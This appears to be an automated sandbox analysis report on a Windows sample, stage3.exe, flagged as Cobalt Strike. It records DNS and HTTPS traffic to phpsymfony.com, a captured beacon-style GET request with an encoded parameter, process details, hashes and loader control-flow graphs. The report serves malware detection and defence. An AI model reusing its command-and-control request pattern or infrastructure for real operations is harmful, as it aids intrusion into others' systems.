                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x4a0000x4a0004e48a4046615b2130b4a21c0e2484ba5False0.7643680057010135data7.162476953082762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 9, 2025 19:42:09.250344038 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:09.250389099 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:09.250459909 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:09.296022892 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:09.296065092 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:09.779484987 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:09.779587984 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.002655983 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.002693892 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:10.003031015 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:10.003109932 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.009346962 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.055335999 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:10.425076962 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:10.425144911 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.425173044 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:10.425214052 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.425226927 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:10.425270081 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.425313950 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.425328970 CET44349711188.114.97.3192.168.2.6
                      Jan 9, 2025 19:42:10.425350904 CET49711443192.168.2.6188.114.97.3
                      Jan 9, 2025 19:42:10.425368071 CET49711443192.168.2.6188.114.97.3
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 9, 2025 19:42:09.189747095 CET6402653192.168.2.61.1.1.1
                      Jan 9, 2025 19:42:09.206484079 CET53640261.1.1.1192.168.2.6
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jan 9, 2025 19:42:09.189747095 CET192.168.2.61.1.1.10x17bfStandard query (0)phpsymfony.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jan 9, 2025 19:42:09.206484079 CET1.1.1.1192.168.2.60x17bfNo error (0)phpsymfony.com188.114.97.3A (IP address)IN (0x0001)false
                      Jan 9, 2025 19:42:09.206484079 CET1.1.1.1192.168.2.60x17bfNo error (0)phpsymfony.com188.114.96.3A (IP address)IN (0x0001)false
                      • phpsymfony.com
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649711188.114.97.34435644C:\Users\user\Desktop\stage3.exe
                      TimestampBytes transferredDirectionData
                      2025-01-09 18:42:10 UTC500OUTGET /css3/index2.shtml?accept=dxKJs6gH4ofAiVSeprcdSa38a5IwcBrYI1fpoKLZa1qInJBaJEPMWED6Ct47l2ciVxCHt-KEOaZ7ITDOTpxC6iOkYQF04UpvBj50kFGpSopROdl80b-4q8r_PoMXlwGH0zx5LyGeO5eQbo2bETT59qsktZZmwF0VT6a04KRJNNU HTTP/1.1
                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                      Accept-Encoding: gzip, deflate
                      Accept-Language: en-US; q=0.7, en; q=0.3
                      Connection: keep-alive
                      DNT: 1
                      Host: phpsymfony.com
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
                      Cache-Control: no-cache
                      2025-01-09 18:42:10 UTC774INHTTP/1.1 200 OK
                      Date: Thu, 09 Jan 2025 18:42:10 GMT
                      Content-Type: application/yin+xml
                      Content-Length: 0
                      Connection: close
                      cf-cache-status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PfQLwQbAnH0X4lRqQNLwRaCzwjmPae91H06ptv8ZbkFsuQVUqo1kgCPrgeUa7Y6M47S86sIzvn%2BZ9bOWDm5vPzlQNuJP9VozYXeq2WHa23r1oKAFZlNDNqnM0ICS2z%2F4pA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 8ff690ccecfade99-EWR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=1519&min_rtt=1518&rtt_var=573&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1082&delivery_rate=1904761&cwnd=217&unsent_bytes=0&cid=269d708053c4d77f&ts=656&x=0"


                      Click to jump to process

                      Click to jump to process

                      Click to jump to process

                      Target ID:0
                      Start time:13:42:07
                      Start date:09/01/2025
                      Path:C:\Users\user\Desktop\stage3.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Users\user\Desktop\stage3.exe"
                      Imagebase:0x400000
                      File size:304'128 bytes
                      MD5 hash:6BCD53CBC0A823F553C5105D0CA07EF7
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000000.2179746172.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.3434549502.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:false

                      Target ID:1
                      Start time:13:42:07
                      Start date:09/01/2025
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff66e660000
                      File size:862'208 bytes
                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high
                      Has exited:false

                      Reset < >

                        Execution Graph

                        Execution Coverage:12.3%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:18
                        Total number of Limit Nodes:0
                        execution_graph 353 417ef3 354 417f6a 353->354 361 4189dd 354->361 356 41800a 367 418d6d 356->367 358 418098 371 418b4d 358->371 362 418a17 361->362 363 418b06 361->363 362->363 364 418a33 LoadLibraryExA 362->364 363->356 366 418a7d 364->366 365 418ac3 VirtualProtect 365->363 366->363 366->365 370 418ddc 367->370 368 419008 368->358 369 418e27 LoadLibraryA 369->370 370->368 370->369 372 4180d3 371->372 373 418b6d 371->373 373->372 374 418b7b VirtualProtect 373->374 374->372

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00437BC3 1 Function_004387C3 2 Function_05C40444 3 Function_004383C2 4 Function_004367C1 5 Function_00437D46 6 Function_004371C5 7 Function_05C40442 8 Function_00438BC4 9 Function_00436DCB 10 Function_0043B3CA 11 Function_00418B4D 12 Function_05C400C8 13 Function_0043BCCD 14 Function_0043BF56 15 Function_05C40053 16 Function_05C4035C 17 Function_05C4015D 16->17 17->12 56 Function_05C400A0 17->56 18 Function_0041815D 19 Function_004189DD 20 Function_00437C63 21 Function_00436CE5 22 Function_0043BD69 23 Function_00418D6D 25 Function_0041816D 23->25 24 Function_00418C6D 26 Function_00437BEE 27 Function_00417EF3 27->11 27->19 27->23 27->24 27->25 46 Function_0041830D 27->46 47 Function_0041878D 27->47 52 Function_0041839D 27->52 63 Function_0041902D 27->63 64 Function_0041872D 27->64 65 Function_00418BAD 27->65 28 Function_00436EF1 29 Function_004012F3 30 Function_00438A77 31 Function_05C403F0 31->16 55 Function_05C4039A 31->55 32 Function_00438676 33 Function_00438275 34 Function_004012F7 35 Function_00437079 36 Function_00438E7F 37 Function_004371FF 38 Function_00401000 39 Function_05C40584 40 Function_00437E01 41 Function_05C40001 42 Function_00436A04 43 Function_00436A84 44 Function_00436D0A 45 Function_00433C89 46->18 48 Function_05C40489 48->31 48->41 49 Function_05C4050B 49->31 49->41 50 Function_00436316 51 Function_00437F19 53 Function_0043731D 54 Function_0040139E 55->17 57 Function_00436AA6 58 Function_004367A5 59 Function_05C4002C 59->41 60 Function_00433C2A 61 Function_0043BF29 62 Function_0043B3A8 66 Function_00436CB5 67 Function_004013B7 68 Function_00401238 69 Function_004333BB 70 Function_0043AABB 71 Function_00433BBA 72 Function_00437BBA 73 Function_00436BBD 74 Function_00437FBC

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 39 5c40489-5c40498 40 5c40505-5c4050a 39->40 41 5c4049a-5c404dc call 5c403f0 39->41 44 5c404e1-5c404e3 41->44 45 5c404e5-5c404ed 44->45 46 5c404ef-5c40504 call 5c40001 44->46 45->40 46->40
                        Memory Dump Source
                        • Source File: 00000000.00000002.3435073197.0000000005C40000.00000020.00000800.00020000.00000000.sdmp, Offset: 05C40000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c40000_stage3.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 95b6baf6b55d288c2a573f251b565679890b56c1c06977ea766ae85f6e464b6a
                        • Instruction ID: 2e89fcddd238b514f7fd2554c32c92bf08e1ee25e883bf4a81bf1cac2ed8ef4a
                        • Opcode Fuzzy Hash: 95b6baf6b55d288c2a573f251b565679890b56c1c06977ea766ae85f6e464b6a
                        • Instruction Fuzzy Hash: B1014F70648B458FEB94EB28D888F6A77E1F798301F00193AA506C7760DB78D6459F41

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 4189dd-418a11 1 418a17-418a2d 0->1 2 418b06-418b0c 0->2 1->2 7 418a33-418a7b LoadLibraryExA 1->7 3 418b32-418b3b 2->3 4 418b0e-418b2d 2->4 4->3 8 418a87-418a8d 7->8 9 418abb-418ac1 8->9 10 418a8f-418a97 8->10 9->2 12 418ac3-418b03 VirtualProtect 9->12 10->9 11 418a99-418a9f 10->11 11->9 13 418aa1-418ab9 11->13 12->2 13->8
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3434549502.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3434526513.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3434549502.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_stage3.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoadProtectVirtual
                        • String ID:
                        • API String ID: 3279857687-0
                        • Opcode ID: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                        • Instruction ID: 0d6bc98b11ff778268dd1260b3abd26939b0e15343f26e5b5a9e7f3f0e49ec07
                        • Opcode Fuzzy Hash: 614a4b05fd2fcf958961d58200ae62ff8fa006310eb0dba3dbba10185b0029ad
                        • Instruction Fuzzy Hash: 5A418872618B8487DB50CB19E48471AB7A1F7C8B94F104226FA8E87B68DF3CD451CF04

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 16 418d6d-418dd7 17 418ddc-418de5 16->17 18 419008-41901c 17->18 19 418deb-418e6f call 41816d LoadLibraryA 17->19 22 418e74-418e7d 19->22 23 418e83-418e89 22->23 24 418ff5-419003 22->24 25 418f62-418fc9 call 41816d 23->25 26 418e8f-418ea7 23->26 24->17 30 418fcc-418fe0 25->30 26->25 27 418ead-418f60 26->27 27->30 31 418ff0 30->31 32 418fe2-418feb 30->32 31->22 32->31
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3434549502.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3434526513.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3434549502.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_stage3.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: a698ff1af4464074b6b40af8f2b3c52d000b635cf7923689dd08e62a2d8bb28c
                        • Instruction ID: 1ef59673d5c59fa6cc82ce20b916003e67b53c9c50fe622c2a5968d84c62715f
                        • Opcode Fuzzy Hash: a698ff1af4464074b6b40af8f2b3c52d000b635cf7923689dd08e62a2d8bb28c
                        • Instruction Fuzzy Hash: 1F619A36219B8486CA60CB0AE49035AB7A0F7C9B94F504526EFCE83B29DF3DD555CB04

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 34 418b4d-418b6b 35 418b99-418b9d 34->35 36 418b6d-418b72 34->36 36->35 37 418b74-418b79 36->37 37->35 38 418b7b-418b96 VirtualProtect 37->38 38->35
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.3434549502.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.3434526513.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.3434549502.0000000000443000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_stage3.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProtectVirtual
                        • String ID:
                        • API String ID: 544645111-0
                        • Opcode ID: 272e92178230a34efbc13890876fd6c15e387d0a065e6ebcff32132a9a05eab2
                        • Instruction ID: 8f19a3653f51f4a553319aec204ca577c76bbad93438d320e1e631d056e23e55
                        • Opcode Fuzzy Hash: 272e92178230a34efbc13890876fd6c15e387d0a065e6ebcff32132a9a05eab2
                        • Instruction Fuzzy Hash: 5EF07FB2A1868586CB60DB54E85434ABBA4F385798F60061AE78842A29CB7DD594CF44